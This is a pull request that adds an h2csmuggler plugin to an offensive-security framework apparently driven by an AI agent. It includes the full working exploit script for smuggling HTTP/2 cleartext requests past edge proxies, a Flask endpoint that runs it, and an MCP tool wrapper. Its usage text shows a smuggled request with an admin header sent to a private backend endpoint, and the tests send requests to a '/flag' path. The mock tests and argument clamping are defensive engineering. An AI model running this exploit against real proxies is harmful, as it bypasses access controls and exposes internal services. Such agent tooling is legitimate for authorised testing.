### PR TITLE
Add h2csmuggler plugin

### DIFF
--- a/dependencies/requirements.txt
+++ b/dependencies/requirements.txt
@@ -9,4 +9,5 @@ beautifulsoup4>=4.12.0,<5.0.0   # HTML parsing (from bs4 import BeautifulSoup)
 selenium>=4.15.0,<5.0.0         # Browser automation (selenium imports)
 webdriver-manager>=4.0.0,<5.0.0 # ChromeDriver management (referenced in code)
 aiohttp>=3.8.0,<4.0.0           # Async HTTP (aiohttp import)
+h2>=4.0.0,<5.0.0                # HTTP/2 library used by h2csmuggler plugin runtime
 PyMySQL>=1.1.2,<2.0.0      # MySQL database connector (conditionally used for database interactions)

--- a/plugins/plugins.yaml
+++ b/plugins/plugins.yaml
@@ -26,6 +26,8 @@
 # ─────────────────────────────────────────────────────────────────────────
 
 tools:
+- name: h2csmuggler
+  enabled: true
 - name: example_net_ping
   enabled: false
 - name: ssh

--- a/plugins/tools/h2csmuggler/h2csmuggler.py
+++ b/plugins/tools/h2csmuggler/h2csmuggler.py
@@ -1,0 +1,381 @@
+#!/usr/bin/env python3
+import h2.connection
+from h2.events import (
+    ResponseReceived, DataReceived, StreamReset, StreamEnded
+)
+
+import argparse
+import multiprocessing.dummy as mp
+import socket
+import ssl
+import sys
+from urllib.parse import urlparse, urljoin
+
+MAX_TIMEOUT = 10
+UPGRADE_ONLY = False
+
+
+def handle_events(events, isVerbose):
+    for event in events:
+        if isinstance(event, ResponseReceived):
+            handle_response(event.headers, event.stream_id)
+        elif isinstance(event, DataReceived):
+            print(event.data.decode('utf-8', 'replace'))
+            print("")
+        elif isinstance(event, StreamReset):
+            raise RuntimeError("stream reset: %d" % event.error_code)
+        else:
+            if isVerbose:
+                print("[INFO] " + str(event))
+
+
+def handle_response(response_headers, stream_id):
+    for name, value in response_headers:
+        print("%s: %s" % (name.decode('utf-8'), value.decode('utf-8')))
+
+    print("")
+
+
+def establish_tcp_connection(proxy_url):
+    global MAX_TIMEOUT
+
+    port = proxy_url.port or (80 if proxy_url.scheme == "http" else 443)
+    connect_args = (proxy_url.hostname, int(port))
+
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    retSock = sock
+    if proxy_url.scheme == "https":
+        context = ssl.create_default_context()
+        context.check_hostname = False
+        context.verify_mode = ssl.CERT_NONE
+        retSock = context.wrap_socket(sock, server_hostname=proxy_url.hostname)
+
+    retSock.settimeout(MAX_TIMEOUT)
+    retSock.connect(connect_args)
+
+    return retSock
+
+
+def send_initial_request(connection, proxy_url, settings):
+    global UPGRADE_ONLY
+    path = proxy_url.path or "/"
+
+    addl_conn_str = b", HTTP2-Settings"
+    if UPGRADE_ONLY:
+        addl_conn_str = b""
+
+    request = (
+        b"GET " + path.encode('utf-8') + b" HTTP/1.1\r\n" +
+        b"Host: " + proxy_url.hostname.encode('utf-8') + b"\r\n" +
+        b"Accept: */*\r\n" +
+        b"Accept-Language: en\r\n" +
+        b"Upgrade: h2c\r\n" +
+        # b"HTTP2-Settings: " + settings + b"\r\n" +
+        #
+        # hyper-h2 base64-encoded settings contain '_' chars, which although
+        # allowed by spec triggered errors on some faulty h2c implementatons.
+        b"HTTP2-Settings: " + b"AAMAAABkAARAAAAAAAIAAAAA" + b"\r\n" +
+        b"Connection: Upgrade" + addl_conn_str + b"\r\n" +
+        b"\r\n"
+    )
+    connection.sendall(request)
+
+
+def get_upgrade_response(connection, proxy_url):
+    data = b''
+    while b'\r\n\r\n' not in data:
+        data += connection.recv(8192)
+
+    headers, rest = data.split(b'\r\n\r\n', 1)
+
+    # An upgrade response begins HTTP/1.1 101 Switching Protocols.
+    split_headers = headers.split()
+    if split_headers[1] != b'101':
+        print("[INFO] Failed to upgrade: " + proxy_url.geturl())
+        return None, False
+
+    return rest, True
+
+
+def getData(h2_connection, sock):
+    events = []
+    try:
+        while True:
+            newdata = sock.recv(8192)
+            events += h2_connection.receive_data(newdata)
+            if len(events) > 0 and isinstance(events[-1], StreamEnded):
+                raise socket.timeout()
+    except socket.timeout:
+        pass
+
+    return events
+
+
+def sendData(h2_connection, connection, data, stream_id):
+    """
+    From: https://github.com/python-hyper/hyper-h2/blob/master/examples/twisted/post_request.py
+    """
+    # Firstly, check what the flow control window is for stream 1.
+    window_size = h2_connection.local_flow_control_window(stream_id=stream_id)
+
+    # Next, check what the maximum frame size is.
+    max_frame_size = h2_connection.max_outbound_frame_size
+
+    file_size = len(data)
+    # We will send no more than the window size or the remaining file size
+    # of data in this call, whichever is smaller.
+    bytes_to_send = min(window_size, file_size)
+
+    # We now need to send a number of data frames.
+    idx = 0
+    while bytes_to_send > 0:
+        chunk_size = min(bytes_to_send, max_frame_size)
+        data_chunk = data[idx:(idx + chunk_size)]
+        h2_connection.send_data(stream_id=stream_id, data=data_chunk)
+
+        idx += chunk_size
+        bytes_to_send -= chunk_size
+        file_size -= chunk_size
+
+    # We've prepared a whole chunk of data to send. If the file is fully
+    # sent, we also want to end the stream: we're done here.
+    if file_size == 0:
+        h2_connection.end_stream(stream_id=stream_id)
+    else:
+        # We've still got data left to send but the window is closed. Save
+        # a Deferred that will call us when the window gets opened.
+        print("[ERROR] Window closed. Incomplete data transmission.",
+              file=sys.stderr)
+
+    connection.write(h2_connection.data_to_send())
+
+
+def sendSmuggledRequest(h2_connection, connection,
+                        smuggled_request_headers, args):
+
+    stream_id = h2_connection.get_next_available_stream_id()
+
+    # Custom Step 2: Send new request on new stream id
+    h2_connection.send_headers(stream_id,
+                               smuggled_request_headers,
+                               end_stream=args.data is None)
+    # Custom Step 3: Immediately send the pending HTTP/2 data.
+    connection.sendall(h2_connection.data_to_send())
+
+    if args.data:
+        sendData(h2_connection,
+                 connection,
+                 args.data.encode("UTF-8"),
+                 stream_id)
+
+    # Custom Step 4: Receive data and process
+    events = getData(h2_connection, connection)
+    handle_events(events, args.verbose)
+
+
+def main(args):
+    """
+    The client upgrade flow.
+    """
+    if not args.proxy.startswith("http"):
+        print("[ERROR]: invalid protocol: " + args.proxy, file=sys.stderr)
+        sys.exit(1)
+
+    proxy_url = urlparse(args.proxy)
+
+    # Step 1: Establish the TCP connecton.
+    connection = establish_tcp_connection(proxy_url)
+
+    # Step 2: Create H2 Connection object, put it in upgrade mode, and get the
+    # value of the HTTP2-Settings header we want to use.
+    h2_connection = h2.connection.H2Connection()
+    settings_header_value = h2_connection.initiate_upgrade_connection()
+
+    # Step 3: Send the initial HTTP/1.1 request with the upgrade fields.
+    send_initial_request(connection, proxy_url, settings_header_value)
+
+    # Step 4: Read the HTTP/1.1 response, look for 101 response.
+    extra_data, success = get_upgrade_response(connection, proxy_url)
+
+    if not success:
+        sys.exit(1)
+
+    print("[INFO] h2c stream established successfully.")
+    if args.test:
+        print("[INFO] Success! " + args.proxy + " can be used for tunneling")
+        sys.exit(0)
+
+    # Step 5: Immediately send the pending HTTP/2 data.
+    connection.sendall(h2_connection.data_to_send())
+
+    # Step 6: Feed the body data to the connection.
+    events = h2_connection.receive_data(extra_data)
+
+    # Step 7 Receive data and process
+    events = getData(h2_connection, connection)
+
+    connection.sendall(h2_connection.data_to_send())
+
+    handle_events(events, args.verbose)
+
+    # Craft request headers and grab next available stream id
+    if args.wordlist:
+        with open(args.wordlist) as fd:
+            urls = [urlparse(urljoin(args.url, url.strip()))
+                    for url in fd.readlines()]
+    else:
+        urls = [urlparse(args.url)]
+
+    for url in urls:
+        path = url.path or "/"
+        query = url.query
+
+        if query:
+            path = path + "?" + query
+
+        smuggled_request_headers = [
+            (':method', args.request),
+            (':authority', url.hostname),
+            (':scheme', url.scheme),
+            (':path', path),
+        ]
+
+        # Add user-defined headers
+        if args.header:
+            for header in args.header:
+                smuggled_request_headers.append(tuple(header.split(": ")))
+
+        # Send request
+        print("[INFO] Requesting - " + path)
+        sendSmuggledRequest(h2_connection,
+                            connection,
+                            smuggled_request_headers,
+                            args)
+
+    # Terminate connection
+    h2_connection.close_connection()
+    connection.sendall(h2_connection.data_to_send())
+    connection.shutdown(socket.SHUT_RDWR)
+    connection.close()
+
+
+def scan(line):
+    connection = None
+    try:
+        proxy_url = urlparse(line)
+        if not line.startswith("http"):
+            print("[ERROR]: skipping invalid protocol: " + line)
+            return
+
+        connection = establish_tcp_connection(proxy_url)
+
+        h2_connection = h2.connection.H2Connection()
+        settings_header_value = h2_connection.initiate_upgrade_connection()
+
+        send_initial_request(connection, proxy_url,
+                             settings_header_value)
+        _, success = get_upgrade_response(connection, proxy_url)
+        if not success:
+            return
+
+        print("[INFO] Success! " + line + " can be used for tunneling")
+        sys.stdout.flush()
+    except Exception as e:
+        print("[ERROR] " + e.__str__() + ": " + line, file=sys.stderr)
+        sys.stderr.flush()
+    finally:
+        if connection:
+            connection.shutdown(socket.SHUT_RDWR)
+            connection.close()
+
+
+def init():
+    global MAX_TIMEOUT, UPGRADE_ONLY
+
+    if sys.version_info < (3, 0):
+        sys.stdout.write("Sorry, requires Python 3.x, not Python 2.x\n")
+        sys.exit(1)
+
+    parser = argparse.ArgumentParser(
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        description="Detect and exploit insecure forwarding of h2c upgrades.",
+        epilog="Example Usage:\n"
+               + sys.argv[0] + " --scan-list urls.txt --threads 5\n"
+               + sys.argv[0] + " -x https://edgeserver http://localhost\n"
+               + sys.argv[0] + " -x https://edgeserver -XPOST -d "
+               "'{\"data\":1}' -H \"Content-Type: application/json\""
+               "-H \"X-ADMIN: true\" http://backend/private/endpoint"
+    )
+    parser.add_argument("--scan-list",
+                        help="list of URLs for scanning")
+    parser.add_argument("--threads",
+                        type=int,
+                        default=5,
+                        help="# of threads (for use with --scan-list)")
+    parser.add_argument("--upgrade-only",
+                        default=False,
+                        action="store_true",
+                        help="drop HTTP2-Settings from outgoing "
+                             "Connection header")
+    parser.add_argument("-x", "--proxy",
+                        help="proxy server to try to bypass")
+    parser.add_argument("-i", "--wordlist",
+                        help="list of paths to bruteforce")
+    parser.add_argument("-X", "--request",
+                        default="GET",
+                        help="smuggled verb")
+    parser.add_argument("-d", "--data",
+                        help="smuggled data")
+    parser.add_argument("-H", "--header",
+                        action="append",
+                        help="smuggled headers")
+    parser.add_argument("-m", "--max-time",
+                        type=float,
+                        default=10,
+                        help="socket timeout in seconds "
+                             "(type: float; default 10)")
+    parser.add_argument("-t", "--test",
+                        help="test a single proxy server",
+                        action="store_true")
+    parser.add_argument("-v", "--verbose",
+                        action="store_true")
+    parser.add_argument("url", nargs="?")
+    args = parser.parse_args()
+
+    MAX_TIMEOUT = args.max_time
+    UPGRADE_ONLY = args.upgrade_only
+
+    if args.scan_list:
+        lines = []
+        with open(args.scan_list) as fd:
+            lines = [line.strip() for line in fd.readlines()]
+
+        p = mp.Pool(args.threads)
+        p.map(scan, lines)
+        p.close()
+        p.join()
+        sys.exit(1)
+
+    if not args.proxy:
+        print("Please provide a server for tunneling ('-x') flag ",
+              file=sys.stderr)
+        sys.exit(1)
+
+    if not args.test and not args.url:
+        print("Please specify the '-t' flag or provide smuggled URL")
+        sys.exit(1)
+
+    if args.url and not urlparse(args.url).scheme:
+        print("Please specify scheme (e.g., http[s]://) for: " + args.url)
+        sys.exit(1)
+
+    if not urlparse(args.proxy).scheme:
+        print("Please specify scheme (e.g., http[s]://) for: " + args.proxy)
+        sys.exit(1)
+
+    main(args)
+
+
+if __name__ == "__main__":
+    init()

--- a/plugins/tools/h2csmuggler/mcp_tool.py
+++ b/plugins/tools/h2csmuggler/mcp_tool.py
@@ -1,0 +1,69 @@
+import asyncio
+from typing import Any, Dict
+
+
+def register(mcp, api_client, logger):
+
+  @mcp.tool()
+  async def nyxstrike_h2csmuggler(
+    proxy: str,
+    target_url: str = "",
+    scan_list: str = "",
+    threads: int = 5,
+    request: str = "GET",
+    data: str = "",
+    headers: str = "",
+    wordlist: str = "",
+    max_time: float = 10,
+    upgrade_only: bool = False,
+    test: bool = False,
+    verbose: bool = False,
+    additional_args: str = "",
+  ) -> Dict[str, Any]:
+    """
+    Detect and exploit insecure forwarding of h2c upgrades.
+
+    Args:
+      proxy: Proxy URL to try to bypass (required)
+      target_url: Smuggled target URL in exploit mode
+      scan_list: File path containing URLs for scan mode
+      threads: Thread count for scan mode
+      request: Smuggled HTTP method
+      data: Smuggled request body
+      headers: Semicolon-delimited smuggled headers
+      wordlist: Optional path list for smuggled path brute-force
+      max_time: Socket timeout in seconds
+      upgrade_only: Drop HTTP2-Settings from Connection header
+      test: Test only mode
+      verbose: Enable verbose output
+      additional_args: Extra raw CLI args
+
+    Returns:
+      h2csmuggler execution results
+    """
+    payload = {
+      "proxy": proxy,
+      "target_url": target_url,
+      "scan_list": scan_list,
+      "threads": threads,
+      "request": request,
+      "data": data,
+      "headers": headers,
+      "wordlist": wordlist,
+      "max_time": max_time,
+      "upgrade_only": upgrade_only,
+      "test": test,
+      "verbose": verbose,
+      "additional_args": additional_args,
+    }
+
+    try:
+      loop = asyncio.get_running_loop()
+      result = await loop.run_in_executor(
+        None,
+        lambda: api_client.safe_post("api/plugins/h2csmuggler", payload),
+      )
+      return result
+    except Exception as exc:
+      logger.error("nyxstrike_h2csmuggler failed: %s", exc)
+      return {"success": False, "error": str(exc)}

--- a/plugins/tools/h2csmuggler/plugin.yaml
+++ b/plugins/tools/h2csmuggler/plugin.yaml
@@ -1,0 +1,67 @@
+name: h2csmuggler
+version: "1.0.0"
+
+description: |
+  Detect and exploit insecure forwarding of h2c upgrades using BishopFox h2csmuggler.
+  Supports test mode, scan-list mode, and smuggled request mode through a target proxy.
+
+author: "system"
+category: web_vuln
+
+tags:
+  - h2c
+  - http2
+  - smuggling
+  - proxy_bypass
+
+endpoint: /api/plugins/h2csmuggler
+mcp_tool_name: nyxstrike_h2csmuggler
+effectiveness: 0.78
+
+check:
+  type: pip
+  binary: h2
+  install: "pip install h2"
+
+params:
+  proxy:
+    required: true
+    description: "Proxy URL to attempt h2c smuggling through (e.g. https://edgeserver)"
+
+optional:
+  target_url:
+    default: ""
+    description: "Smuggled target URL for exploit mode"
+  scan_list:
+    default: ""
+    description: "Path to file containing URLs to test in scan mode"
+  threads:
+    default: 5
+    description: "Thread count for scan mode"
+  request:
+    default: "GET"
+    description: "Smuggled HTTP method"
+  data:
+    default: ""
+    description: "Smuggled request body"
+  headers:
+    default: ""
+    description: "Semicolon-delimited headers, e.g. X-A:1; X-B:2"
+  wordlist:
+    default: ""
+    description: "Path list for internal endpoint brute-force"
+  max_time:
+    default: 10
+    description: "Socket timeout in seconds"
+  upgrade_only:
+    default: false
+    description: "Drop HTTP2-Settings from outgoing Connection header"
+  test:
+    default: false
+    description: "Use h2csmuggler test mode"
+  verbose:
+    default: false
+    description: "Enable verbose h2csmuggler output"
+  additional_args:
+    default: ""
+    description: "Additional raw CLI arguments appended to command"

--- a/plugins/tools/h2csmuggler/plugin.yaml
+++ b/plugins/tools/h2csmuggler/plugin.yaml
@@ -5,7 +5,7 @@ description: |
   Detect and exploit insecure forwarding of h2c upgrades using BishopFox h2csmuggler.
   Supports test mode, scan-list mode, and smuggled request mode through a target proxy.
 
-author: "system"
+author: "garthoid"
 category: web_vuln
 
 tags:

--- a/plugins/tools/h2csmuggler/server_api.py
+++ b/plugins/tools/h2csmuggler/server_api.py
@@ -1,0 +1,137 @@
+import logging
+import os
+import shlex
+from pathlib import Path
+
+from flask import Blueprint, jsonify, request
+
+from server_core.command_executor import execute_command
+
+logger = logging.getLogger(__name__)
+blueprint = Blueprint("plugin_h2csmuggler", __name__)
+
+DEFAULT_SCRIPT_PATH = "/usr/local/bin/h2csmuggler.py"
+
+
+def _as_bool(value):
+  if isinstance(value, bool):
+    return value
+  if value is None:
+    return False
+  if isinstance(value, (int, float)):
+    return value != 0
+  return str(value).strip().lower() in {"1", "true", "yes", "y", "on"}
+
+
+def _parse_headers(raw_headers):
+  if isinstance(raw_headers, list):
+    return [str(h).strip() for h in raw_headers if str(h).strip()]
+  if not raw_headers:
+    return []
+  return [h.strip() for h in str(raw_headers).split(";") if h.strip()]
+
+
+def _valid_url(url):
+  return isinstance(url, str) and url.startswith(("http://", "https://"))
+
+
+def _resolve_script_path():
+  env_path = os.getenv("NYXSTRIKE_H2CSMUGGLER_PATH", "").strip()
+  candidates = [
+    env_path,
+    DEFAULT_SCRIPT_PATH,
+    str(Path(__file__).parent / "h2csmuggler.py"),
+  ]
+  for candidate in candidates:
+    if candidate and Path(candidate).is_file():
+      return candidate
+  return ""
+
+
+@blueprint.route("/api/plugins/h2csmuggler", methods=["POST"])
+def h2csmuggler():
+  data = request.get_json(force=True) or {}
+
+  proxy = str(data.get("proxy", "")).strip()
+  target_url = str(data.get("target_url", "")).strip()
+  scan_list = str(data.get("scan_list", "")).strip()
+  request_method = str(data.get("request", "GET")).strip().upper() or "GET"
+  req_data = str(data.get("data", ""))
+  headers = _parse_headers(data.get("headers", ""))
+  wordlist = str(data.get("wordlist", "")).strip()
+  additional_args = str(data.get("additional_args", "")).strip()
+  upgrade_only = _as_bool(data.get("upgrade_only", False))
+  test = _as_bool(data.get("test", False))
+  verbose = _as_bool(data.get("verbose", False))
+
+  try:
+    max_time = float(data.get("max_time", 10))
+  except (TypeError, ValueError):
+    max_time = 10
+  max_time = max(1, min(max_time, 120))
+
+  try:
+    threads = int(data.get("threads", 5))
+  except (TypeError, ValueError):
+    threads = 5
+  threads = max(1, min(threads, 50))
+
+  if not proxy:
+    return jsonify({"error": "Missing required parameter: proxy", "success": False}), 400
+  if not _valid_url(proxy):
+    return jsonify({"error": "proxy must start with http:// or https://", "success": False}), 400
+
+  if scan_list:
+    mode = "scan"
+  elif test:
+    mode = "test"
+  else:
+    mode = "exploit"
+
+  if mode == "scan" and test:
+    return jsonify({"error": "scan_list mode cannot be combined with test=true", "success": False}), 400
+  if mode == "exploit":
+    if not target_url:
+      return jsonify({"error": "target_url is required in exploit mode", "success": False}), 400
+    if not _valid_url(target_url):
+      return jsonify({"error": "target_url must start with http:// or https://", "success": False}), 400
+  if mode == "scan" and not Path(scan_list).is_file():
+    return jsonify({"error": "scan_list file not found", "success": False}), 400
+
+  script_path = _resolve_script_path()
+  if not script_path:
+    return jsonify({
+      "error": "h2csmuggler.py not found. Set NYXSTRIKE_H2CSMUGGLER_PATH or install to /usr/local/bin/h2csmuggler.py",
+      "success": False,
+    }), 500
+
+  cmd = ["python3", script_path, "-x", proxy, "-m", str(max_time)]
+
+  if upgrade_only:
+    cmd.append("--upgrade-only")
+  if verbose:
+    cmd.append("-v")
+
+  if mode == "scan":
+    cmd.extend(["--scan-list", scan_list, "--threads", str(threads)])
+  elif mode == "test":
+    cmd.append("-t")
+  else:
+    cmd.extend(["-X", request_method])
+    if req_data:
+      cmd.extend(["-d", req_data])
+    for header in headers:
+      cmd.extend(["-H", header])
+    if wordlist:
+      cmd.extend(["-i", wordlist])
+    cmd.append(target_url)
+
+  if additional_args:
+    cmd.extend(shlex.split(additional_args))
+
+  command = " ".join(shlex.quote(part) for part in cmd)
+  timeout = max(60, int(max_time * max(1, threads)) + 15)
+
+  logger.info("Starting h2csmuggler mode=%s proxy=%s", mode, proxy)
+  result = execute_command(command, use_cache=False, timeout=timeout)
+  return jsonify(result)

--- a/tests/test_plugin_h2csmuggler.py
+++ b/tests/test_plugin_h2csmuggler.py
@@ -1,0 +1,166 @@
+"""
+tests/test_plugin_h2csmuggler.py
+
+Validation and command-builder tests for the h2csmuggler plugin endpoint.
+
+These tests run against the Flask app test client and patch the dynamically
+loaded plugin module's local execute_command reference so no real tool runs.
+"""
+
+import os
+import sys
+from unittest.mock import patch
+
+import pytest
+
+
+_MOCK_RESULT = {
+    "success": True,
+    "stdout": "mocked",
+    "stderr": "",
+    "return_code": 0,
+    "execution_time": 0.01,
+}
+
+
+@pytest.fixture(scope="module")
+def app():
+    os.environ.setdefault("NYXSTRIKE_API_TOKEN", "")
+    from nyxstrike_server import app as _app
+
+    _app.config["TESTING"] = True
+    return _app
+
+
+@pytest.fixture()
+def client(app):
+    return app.test_client()
+
+
+def _post(client, payload):
+    return client.post(
+        "/api/plugins/h2csmuggler",
+        json=payload,
+        content_type="application/json",
+    )
+
+
+def _plugin_module():
+    mod = sys.modules.get("_plugin_tool_server_api_h2csmuggler")
+    assert mod is not None, "h2csmuggler plugin module not loaded"
+    return mod
+
+
+class TestH2csmugglerValidation:
+    def test_missing_proxy_returns_400(self, client):
+        r = _post(client, {})
+        assert r.status_code == 400
+        assert r.get_json()["error"] == "Missing required parameter: proxy"
+
+    def test_proxy_scheme_required(self, client):
+        r = _post(client, {"proxy": "localhost:8102", "test": True})
+        assert r.status_code == 400
+        assert "proxy must start with http:// or https://" in r.get_json()["error"]
+
+    def test_exploit_mode_requires_target_url(self, client):
+        r = _post(client, {"proxy": "https://localhost:8102"})
+        assert r.status_code == 400
+        assert r.get_json()["error"] == "target_url is required in exploit mode"
+
+    def test_target_url_scheme_required_in_exploit_mode(self, client):
+        r = _post(
+            client,
+            {"proxy": "https://localhost:8102", "target_url": "localhost/flag"},
+        )
+        assert r.status_code == 400
+        assert "target_url must start with http:// or https://" in r.get_json()["error"]
+
+    def test_scan_list_file_must_exist(self, client):
+        r = _post(
+            client,
+            {"proxy": "https://localhost:8102", "scan_list": "/tmp/opencode/does-not-exist"},
+        )
+        assert r.status_code == 400
+        assert r.get_json()["error"] == "scan_list file not found"
+
+    def test_scan_and_test_conflict_rejected(self, client):
+        r = _post(
+            client,
+            {
+                "proxy": "https://localhost:8102",
+                "scan_list": "/etc/hosts",
+                "test": True,
+            },
+        )
+        assert r.status_code == 400
+        assert r.get_json()["error"] == "scan_list mode cannot be combined with test=true"
+
+
+class TestH2csmugglerCommandBuilder:
+    def test_test_mode_builds_t_flag(self, client):
+        with patch.object(_plugin_module(), "execute_command", return_value=_MOCK_RESULT) as mock_exec:
+            r = _post(client, {"proxy": "https://localhost:8102", "test": True})
+            assert r.status_code == 200
+            cmd = mock_exec.call_args[0][0]
+            assert "python3" in cmd
+            assert "h2csmuggler.py" in cmd
+            assert "-x" in cmd and "https://localhost:8102" in cmd
+            assert " -t" in cmd
+
+    def test_scan_mode_builds_scan_flags_and_clamps_threads(self, client):
+        with patch.object(_plugin_module(), "execute_command", return_value=_MOCK_RESULT) as mock_exec:
+            r = _post(
+                client,
+                {
+                    "proxy": "https://localhost:8102",
+                    "scan_list": "/etc/hosts",
+                    "threads": 999,
+                },
+            )
+            assert r.status_code == 200
+            cmd = mock_exec.call_args[0][0]
+            assert "--scan-list" in cmd
+            assert "/etc/hosts" in cmd
+            assert "--threads 50" in cmd
+
+    def test_exploit_mode_builds_request_headers_and_data(self, client):
+        with patch.object(_plugin_module(), "execute_command", return_value=_MOCK_RESULT) as mock_exec:
+            r = _post(
+                client,
+                {
+                    "proxy": "https://localhost:8102",
+                    "target_url": "http://localhost/flag",
+                    "request": "post",
+                    "data": '{"x":1}',
+                    "headers": "X-Test: 1; X-Forwarded-For: 127.0.0.1",
+                    "wordlist": "/tmp/paths.txt",
+                    "verbose": True,
+                    "upgrade_only": True,
+                    "additional_args": "--foo bar",
+                },
+            )
+            assert r.status_code == 200
+            cmd = mock_exec.call_args[0][0]
+            assert "-X POST" in cmd
+            assert "-d" in cmd and '{"x":1}' in cmd
+            assert "-H 'X-Test: 1'" in cmd
+            assert "-H 'X-Forwarded-For: 127.0.0.1'" in cmd
+            assert "-i /tmp/paths.txt" in cmd
+            assert "--upgrade-only" in cmd
+            assert " -v" in cmd
+            assert "http://localhost/flag" in cmd
+            assert "--foo" in cmd and "bar" in cmd
+
+    def test_max_time_is_clamped(self, client):
+        with patch.object(_plugin_module(), "execute_command", return_value=_MOCK_RESULT) as mock_exec:
+            r = _post(
+                client,
+                {
+                    "proxy": "https://localhost:8102",
+                    "target_url": "http://localhost/",
+                    "max_time": 999,
+                },
+            )
+            assert r.status_code == 200
+            cmd = mock_exec.call_args[0][0]
+            assert "-m 120" in cmd


### PR DESCRIPTION
## Description

This PR add a plugin for the BishopFox h2csmuggler tool.  h2cSmuggler smuggles HTTP traffic past insecure edge-server proxy_pass configurations by establishing HTTP/2 cleartext (h2c) communications with h2c-compatible back-end servers, allowing a bypass of proxy rules and access controls.

---

## Type of change

- [ ] Bug fix
- [ x] New feature
- [ ] Refactor
- [ ] Documentation update
- [ ] Formatting / linting only

---

## Scope rules

✅ This PR only modifies files relevant to the change  
✅ This PR does NOT include unrelated formatting changes  
✅ Large formatting changes are submitted in a separate PR  

---

## AI Usage Disclosure

If AI tools were used while creating this PR:

- [ ] No AI used
- [x ] AI assisted, but all code was reviewed and verified by the author

> Note: PRs containing unreviewed or bulk AI-generated changes may be rejected.

---

## Testing

- [x ] I have tested my changes

---

